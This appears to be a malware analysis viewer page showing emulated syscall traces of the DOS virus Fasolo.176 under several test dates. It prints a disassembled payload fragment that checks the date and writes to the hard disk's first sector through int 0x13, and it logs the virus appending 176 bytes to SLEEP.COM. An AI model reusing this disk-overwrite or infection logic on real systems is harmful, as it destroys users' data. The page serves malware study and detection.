Sample viewer

vx.netlux.org/Virus.DOS.Fasolo.176

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:32:01.035908878Z 42 PC: 12a44 | Get date 0x12a44: cmp dh, 0xc
0x12a47: jne 0x12a94
0x12a49: sbb byte ptr [bp + di], 4
0x12a4c: jne 0x12a94
0x12a4e: in al, 0x21
0x12a50: or al, 2
0x12a52: out 0x21, al
0x12a54: mov ah, 2
0x12a56: mov dl, 7
0x12a58: int 0x21
0x12a5a: mov ah, 3
0x12a5c: mov al, 0x80
0x12a5e: mov ch, 0
0x12a60: mov cl, 1
0x12a62: mov dh, 0
0x12a64: mov dl, 0x80
0x12a66: mov bx, 0
0x12a69: int 0x13
0x12a6b: sti
0x12a6c: mov al, 0x10
2018-12-17T22:32:01.038584835Z 78 PC: 12a9b | Find first file
2018-12-17T22:32:01.044472317Z 61 PC: 12aa3 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:32:01.050815557Z 63 PC: 12aae | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:32:01.057347085Z 62 PC: 12ab2 | Close file
2018-12-17T22:32:01.058997589Z 61 PC: 12acd | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:32:01.06538771Z 64 PC: 12ad8 | Write file or device (Write 176 bytes on handle 5)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5716,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:17.597223821Z 42 PC: 12a44 | Get date 0x12a44: cmp dh, 0xc
0x12a47: jne 0x12a94
0x12a49: sbb byte ptr [bp + di], 4
0x12a4c: jne 0x12a94
0x12a4e: in al, 0x21
0x12a50: or al, 2
0x12a52: out 0x21, al
0x12a54: mov ah, 2
0x12a56: mov dl, 7
0x12a58: int 0x21
0x12a5a: mov ah, 3
0x12a5c: mov al, 0x80
0x12a5e: mov ch, 0
0x12a60: mov cl, 1
0x12a62: mov dh, 0
0x12a64: mov dl, 0x80
0x12a66: mov bx, 0
0x12a69: int 0x13
0x12a6b: sti
0x12a6c: mov al, 0x10
2018-12-25T11:55:17.602426176Z 78 PC: 12a9b | Find first file
2018-12-25T11:55:17.608132935Z 61 PC: 12aa3 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:17.614317823Z 63 PC: 12aae | Read file or device (Read 2 bytes on handle 5)
2018-12-25T11:55:17.621283107Z 62 PC: 12ab2 | Close file
2018-12-25T11:55:17.622992128Z 61 PC: 12acd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:17.634124443Z 64 PC: 12ad8 | Write file or device (Write 176 bytes on handle 5)

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5716,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:17.729065351Z 42 PC: 12a44 | Get date 0x12a44: cmp dh, 0xc
0x12a47: jne 0x12a94
0x12a49: sbb byte ptr [bp + di], 4
0x12a4c: jne 0x12a94
0x12a4e: in al, 0x21
0x12a50: or al, 2
0x12a52: out 0x21, al
0x12a54: mov ah, 2
0x12a56: mov dl, 7
0x12a58: int 0x21
0x12a5a: mov ah, 3
0x12a5c: mov al, 0x80
0x12a5e: mov ch, 0
0x12a60: mov cl, 1
0x12a62: mov dh, 0
0x12a64: mov dl, 0x80
0x12a66: mov bx, 0
0x12a69: int 0x13
0x12a6b: sti
0x12a6c: mov al, 0x10
2018-12-25T11:55:17.732062412Z 78 PC: 12a9b | Find first file
2018-12-25T11:55:17.738686Z 61 PC: 12aa3 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:17.745840661Z 63 PC: 12aae | Read file or device (Read 2 bytes on handle 5)
2018-12-25T11:55:17.758880668Z 62 PC: 12ab2 | Close file
2018-12-25T11:55:17.761256462Z 61 PC: 12acd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:17.768808735Z 64 PC: 12ad8 | Write file or device (Write 176 bytes on handle 5)